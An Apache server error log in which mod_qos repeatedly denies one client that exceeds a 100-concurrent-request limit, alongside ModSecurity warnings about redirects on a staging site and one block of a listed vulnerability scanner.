[Tue May 26 19:59:28.780957 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSGDRMqfxdEDkoszwLQAAAEk
[Tue May 26 19:59:28.782544 2026] [qos:error] [pid 93868:tid 94274] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSEqK9k_ZUB2Vp256eQAAAZ8
[Tue May 26 19:59:28.785252 2026] [qos:error] [pid 93868:tid 94381] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSEqK9k_ZUB2Vp256egAAAgo
[Tue May 26 19:59:28.786274 2026] [qos:error] [pid 93868:tid 94264] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSEqK9k_ZUB2Vp256ewAAAZU
[Tue May 26 19:59:28.788485 2026] [qos:error] [pid 93576:tid 93794] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSGDRMqfxdEDkoszwMQAAAFI
[Tue May 26 19:59:28.790646 2026] [qos:error] [pid 93868:tid 94271] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSEqK9k_ZUB2Vp256fQAAAZw
[Tue May 26 19:59:28.791365 2026] [qos:error] [pid 93868:tid 94271] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSEqK9k_ZUB2Vp256fgAAAZw
[Tue May 26 19:59:28.791678 2026] [qos:error] [pid 93576:tid 93804] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSGDRMqfxdEDkoszwMgAAAFw
[Tue May 26 19:59:28.792173 2026] [qos:error] [pid 93576:tid 93800] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSGDRMqfxdEDkoszwMwAAAFg
[Tue May 26 19:59:28.793192 2026] [qos:error] [pid 93576:tid 93838] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSGDRMqfxdEDkoszwNAAAAH4
[Tue May 26 19:59:29.054142 2026] [qos:error] [pid 93868:tid 94374] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256hAAAAgM
[Tue May 26 19:59:29.056745 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwPAAAACE
[Tue May 26 19:59:29.057741 2026] [qos:error] [pid 93868:tid 94299] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256hQAAAbg
[Tue May 26 19:59:29.058483 2026] [qos:error] [pid 93868:tid 94298] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256hgAAAbc
[Tue May 26 19:59:29.059676 2026] [qos:error] [pid 93868:tid 94323] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256hwAAAdA
[Tue May 26 19:59:29.060422 2026] [qos:error] [pid 93868:tid 94318] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256iAAAAcs
[Tue May 26 19:59:29.060899 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwPQAAAAU
[Tue May 26 19:59:29.061535 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwPgAAAEU
[Tue May 26 19:59:29.062097 2026] [qos:error] [pid 93868:tid 94300] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256iQAAAbk
[Tue May 26 19:59:29.065508 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwPwAAADs
[Tue May 26 19:59:29.237426 2026] [qos:error] [pid 93868:tid 94260] [client 45.148.10.120:34972] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256jwAAAZE
[Tue May 26 19:59:29.243696 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35344] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwQwAAACw
[Tue May 26 19:59:29.244348 2026] [qos:error] [pid 93868:tid 94354] [client 45.148.10.120:35198] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256kAAAAe8
[Tue May 26 19:59:29.247544 2026] [qos:error] [pid 93868:tid 94265] [client 45.148.10.120:35250] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256kQAAAZY
[Tue May 26 19:59:29.259610 2026] [qos:error] [pid 93576:tid 93792] [client 45.148.10.120:35090] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwRAAAAFA
[Tue May 26 19:59:29.260583 2026] [qos:error] [pid 93868:tid 94341] [client 45.148.10.120:35230] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256kgAAAeI
[Tue May 26 19:59:29.265288 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35176] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwRQAAAD4
[Tue May 26 19:59:29.268217 2026] [qos:error] [pid 93868:tid 94349] [client 45.148.10.120:35106] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256lAAAAeo
[Tue May 26 19:59:29.268561 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:35232] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256kwAAAeE
[Tue May 26 19:59:29.271161 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:35102] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwRgAAAGY
[Tue May 26 19:59:29.273785 2026] [security2:error] [pid 106517:tid 106719] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O3wAAAMk"]
[Tue May 26 19:59:29.292909 2026] [security2:error] [pid 93868:tid 94353] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256CwAAAe4"]
[Tue May 26 19:59:29.294701 2026] [security2:error] [pid 106517:tid 106667] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O7wAAAJY"]
[Tue May 26 19:59:29.300377 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O4QAAANE"]
[Tue May 26 19:59:29.308318 2026] [security2:error] [pid 93576:tid 93832] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR2DRMqfxdEDkoszvzgAAAHg"]
[Tue May 26 19:59:29.310929 2026] [security2:error] [pid 106517:tid 106728] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O6gAAANI"]
[Tue May 26 19:59:29.313136 2026] [security2:error] [pid 106517:tid 106752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O6QAAAOo"]
[Tue May 26 19:59:29.313884 2026] [security2:error] [pid 106517:tid 106683] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O-gAAAKU"]
[Tue May 26 19:59:29.331616 2026] [security2:error] [pid 93868:tid 94338] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256HwAAAd8"]
[Tue May 26 19:59:29.335039 2026] [security2:error] [pid 93868:tid 94366] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256IQAAAfs"]
[Tue May 26 19:59:29.344928 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256IAAAAdQ"]
[Tue May 26 19:59:29.355865 2026] [security2:error] [pid 106517:tid 106661] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1PBAAAAJA"]
[Tue May 26 19:59:29.356823 2026] [security2:error] [pid 106517:tid 106778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O9wAAAQQ"]
[Tue May 26 19:59:29.358674 2026] [security2:error] [pid 106517:tid 106760] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O_gAAAPI"]
[Tue May 26 19:59:29.365389 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR2DRMqfxdEDkoszv0QAAACI"]
[Tue May 26 19:59:29.373116 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR2DRMqfxdEDkoszv2wAAABs"]
[Tue May 26 19:59:29.375512 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSIZZc2DoU1lPnP1PDQAAAMw"]
[Tue May 26 19:59:29.379280 2026] [security2:error] [pid 93868:tid 94326] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR0qK9k_ZUB2Vp256IwAAAdM"]
[Tue May 26 19:59:29.384712 2026] [security2:error] [pid 93576:tid 93772] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR2DRMqfxdEDkoszv3wAAADw"]
[Tue May 26 19:59:29.390483 2026] [security2:error] [pid 93868:tid 94303] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSEqK9k_ZUB2Vp256OgAAAbw"]
[Tue May 26 19:59:29.390706 2026] [security2:error] [pid 106517:tid 106699] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1PBgAAALU"]
[Tue May 26 19:59:29.393836 2026] [security2:error] [pid 106517:tid 106652] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuR4ZZc2DoU1lPnP1O_AAAAIc"]
[Tue May 26 19:59:29.416933 2026] [security2:error] [pid 93576:tid 93782] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuSGDRMqfxdEDkoszwAgAAAEY"]
[Tue May 26 19:59:29.515963 2026] [qos:error] [pid 93576:tid 93806] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSWDRMqfxdEDkoszwggAAAF4
[Tue May 26 19:59:29.522871 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSWDRMqfxdEDkoszwhAAAAAc
[Tue May 26 19:59:29.525263 2026] [qos:error] [pid 106517:tid 106749] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSYZZc2DoU1lPnP1PIAAAAOc
[Tue May 26 19:59:29.532887 2026] [qos:error] [pid 93868:tid 94265] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256sAAAAZY
[Tue May 26 19:59:29.532953 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwiAAAAEk
[Tue May 26 19:59:29.533918 2026] [qos:error] [pid 93576:tid 93724] [client 45.148.10.120:0] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=50.87.254.159, id=ahWuSWDRMqfxdEDkoszwiQAAAAw
[Tue May 26 19:59:29.541908 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwiwAAAG8
[Tue May 26 19:59:29.549151 2026] [qos:error] [pid 93576:tid 93833] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwjAAAAHk
[Tue May 26 19:59:29.550383 2026] [qos:error] [pid 93576:tid 93829] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwjQAAAHU
[Tue May 26 19:59:29.596247 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwjwAAACg
[Tue May 26 19:59:29.667928 2026] [qos:error] [pid 93868:tid 94282] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256sgAAAac
[Tue May 26 19:59:29.673903 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwkQAAACE
[Tue May 26 19:59:29.675893 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256tAAAAeE
[Tue May 26 19:59:29.680211 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwkgAAABc
[Tue May 26 19:59:29.683455 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwkwAAADs
[Tue May 26 19:59:29.686194 2026] [qos:error] [pid 93868:tid 94346] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256tQAAAec
[Tue May 26 19:59:29.691597 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwlAAAAAI
[Tue May 26 19:59:29.705132 2026] [qos:error] [pid 93576:tid 93757] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwlwAAAC0
[Tue May 26 19:59:29.706102 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwmAAAAE4
[Tue May 26 19:59:29.749864 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwmQAAAHM
[Tue May 26 19:59:29.770137 2026] [security2:error] [pid 93576:tid 93620] [remote 52.167.144.136:57370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 136.144.167.52.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "gciamd.org.in"] [uri "/amd-about-india.php"] [unique_id "ahWuSWDRMqfxdEDkoszwlgAARik"]
[Tue May 26 19:59:29.817956 2026] [qos:error] [pid 93868:tid 94369] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256uwAAAf4
[Tue May 26 19:59:29.821528 2026] [qos:error] [pid 93576:tid 93739] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwmgAAABs
[Tue May 26 19:59:29.828715 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwmwAAAAc
[Tue May 26 19:59:29.829464 2026] [qos:error] [pid 93868:tid 94308] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256vAAAAcE
[Tue May 26 19:59:29.832078 2026] [qos:error] [pid 93576:tid 93830] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwnAAAAHY
[Tue May 26 19:59:29.840411 2026] [qos:error] [pid 93868:tid 94330] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256vgAAAdc
[Tue May 26 19:59:29.841599 2026] [qos:error] [pid 93576:tid 93751] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwnQAAACc
[Tue May 26 19:59:29.859713 2026] [qos:error] [pid 93576:tid 93772] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwoAAAADw
[Tue May 26 19:59:29.860172 2026] [qos:error] [pid 93576:tid 93737] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwoQAAABk
[Tue May 26 19:59:29.904135 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwogAAAFY
[Tue May 26 19:59:29.968969 2026] [qos:error] [pid 93868:tid 94319] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256wAAAAcw
[Tue May 26 19:59:29.969490 2026] [qos:error] [pid 93576:tid 93823] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwpAAAAG8
[Tue May 26 19:59:29.978434 2026] [qos:error] [pid 93576:tid 93752] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwpgAAACg
[Tue May 26 19:59:29.981110 2026] [qos:error] [pid 93576:tid 93766] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwpwAAADY
[Tue May 26 19:59:29.981125 2026] [qos:error] [pid 93868:tid 94370] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=102, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256wgAAAf8
[Tue May 26 19:59:29.991037 2026] [qos:error] [pid 93576:tid 93801] [client 45.148.10.120:35166] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSWDRMqfxdEDkoszwqAAAAFk
[Tue May 26 19:59:29.993793 2026] [qos:error] [pid 93868:tid 94262] [client 45.148.10.120:35060] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSUqK9k_ZUB2Vp256wwAAAZM
[Tue May 26 19:59:30.013633 2026] [qos:error] [pid 93576:tid 93745] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwqgAAACE
[Tue May 26 19:59:30.016110 2026] [qos:error] [pid 93576:tid 93735] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwqwAAABc
[Tue May 26 19:59:30.056345 2026] [qos:error] [pid 93576:tid 93767] [client 45.148.10.120:35182] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwrAAAADc
[Tue May 26 19:59:30.117297 2026] [qos:error] [pid 93576:tid 93714] [client 45.148.10.120:35272] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwrgAAAAI
[Tue May 26 19:59:30.118579 2026] [qos:error] [pid 93868:tid 94328] [client 45.148.10.120:35050] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp256yQAAAdU
[Tue May 26 19:59:30.127819 2026] [qos:error] [pid 93576:tid 93790] [client 45.148.10.120:35336] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwsAAAAE4
[Tue May 26 19:59:30.128718 2026] [qos:error] [pid 93576:tid 93827] [client 45.148.10.120:34990] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSmDRMqfxdEDkoszwsQAAAHM
[Tue May 26 19:59:30.132723 2026] [qos:error] [pid 93868:tid 94378] [client 45.148.10.120:35074] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuSkqK9k_ZUB2Vp256ygAAAgc
